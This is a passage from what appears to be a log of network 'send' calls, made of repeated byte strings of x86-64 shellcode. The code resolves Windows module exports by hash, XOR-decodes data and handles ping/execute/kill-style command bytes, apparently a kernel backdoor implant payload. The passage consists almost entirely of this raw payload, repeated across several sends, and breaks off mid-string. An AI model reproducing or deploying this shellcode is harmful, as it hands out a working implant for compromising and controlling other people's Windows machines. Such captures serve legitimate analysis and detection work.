\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 4, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 5, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 6, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 